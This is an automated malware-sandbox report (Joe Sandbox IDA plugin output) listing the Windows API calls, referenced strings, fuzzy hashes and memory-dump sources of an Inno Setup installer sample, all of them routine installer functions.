                                                                                            • Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                                            • Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
                                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 0045530A
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                            • String ID:
                                                                                            • API String ID: 4283692357-0
                                                                                            • Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                                            • Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
                                                                                            • Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                                            • Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(0000003C,00000000), ref: 0046F5D5
                                                                                            Strings
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
                                                                                            • Setting NTFS compression on file: %s, xrefs: 0046F5A3
                                                                                            • Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                            • API String ID: 1452528299-3038984924
                                                                                            • Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                            • Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
                                                                                            • Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                            • Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CountSleepTick
                                                                                            • String ID:
                                                                                            • API String ID: 2227064392-0
                                                                                            • Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                            • Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
                                                                                            • Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                            • Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
                                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
                                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                            • String ID:
                                                                                            • API String ID: 215268677-0
                                                                                            • Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                            • Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
                                                                                            • Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                            • Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66
                                                                                            APIs
                                                                                            • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                            • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                            • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                            • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                            • String ID:
                                                                                            • API String ID: 2280970139-0
                                                                                            • Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                            • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                            • Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                            • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                            APIs
                                                                                            • GlobalHandle.KERNEL32 ref: 00406287
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocHandleLockUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 2167344118-0
                                                                                            • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                            • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                            • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                            • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
                                                                                            • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$EnableItemSystem
                                                                                            • String ID: CurPageChanged
                                                                                            • API String ID: 3692539535-2490978513
                                                                                            • Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                            • Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
                                                                                            • Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                            • Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075
                                                                                            Strings
                                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
                                                                                            • Failed to parse "reg" constant, xrefs: 0047907C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                            • API String ID: 3535843008-1938159461
                                                                                            • Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                            • Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
                                                                                            • Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                            • Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
                                                                                            • SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981
                                                                                            Strings
                                                                                            • Will not restart Windows automatically., xrefs: 00481AA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveForeground
                                                                                            • String ID: Will not restart Windows automatically.
                                                                                            • API String ID: 307657957-4169339592
                                                                                            • Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                            • Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
                                                                                            • Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                            • Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(?), ref: 00424975
                                                                                            • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorMessageWait
                                                                                            • String ID: +qI
                                                                                            • API String ID: 4021538199-4068327824
                                                                                            • Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                            • Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
                                                                                            • Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                            • Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
                                                                                            Strings
                                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
                                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046BD57
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                            • API String ID: 0-1974262853
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F
                                                                                            Strings
                                                                                            • %s\%s_is1, xrefs: 004779B8
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1598650737
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E
                                                                                            Similarity
                                                                                            • API ID: ExecuteMessageSendShell
                                                                                            • String ID: open
                                                                                            • API String ID: 812272486-2758837156
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                            • String ID: )
                                                                                            • API String ID: 2227675388-1084416617
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5
                                                                                            Similarity
                                                                                            • API ID: Window
                                                                                            • String ID: /INITPROCWND=$%x $@
                                                                                            • API String ID: 2353593579-4169826103
                                                                                            APIs
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • SysFreeString.OLEAUT32(?), ref: 00446D1A
                                                                                            Similarity
                                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                                            • API String ID: 3952431833-1023667238
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
                                                                                            • CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881
                                                                                              • Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                                            • String ID: D
                                                                                            • API String ID: 3798668922-2746444292
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
                                                                                            Similarity
                                                                                            • API ID: Value$EnumQuery
                                                                                            • String ID: Inno Setup: No Icons
                                                                                            • API String ID: 1576479698-2016326496
                                                                                            APIs
                                                                                              • Part of subcall function 0047BB30: FreeLibrary.KERNEL32(74600000,0047FFE2), ref: 0047BB46
                                                                                              • Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C
                                                                                              • Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB
                                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523
                                                                                            Strings
                                                                                            • Detected restart. Removing temporary directory., xrefs: 004964D7
                                                                                            Similarity
                                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                                            • API String ID: 1717587489-3199836293
                                                                                            APIs
                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                            • ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteFileHandleMutexRelease
                                                                                            • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                                            • API String ID: 3841931355-3392794427
                                                                                            • Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                                            • Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
                                                                                            • Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                                            • Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C
                                                                                            APIs
                                                                                            • SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
                                                                                            • GetFocus.USER32 ref: 00421D69
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Focus
                                                                                            • String ID: +qI
                                                                                            • API String ID: 2734777837-4068327824
                                                                                            • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                            • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                                            • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                            • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                                            APIs
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
                                                                                            • FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
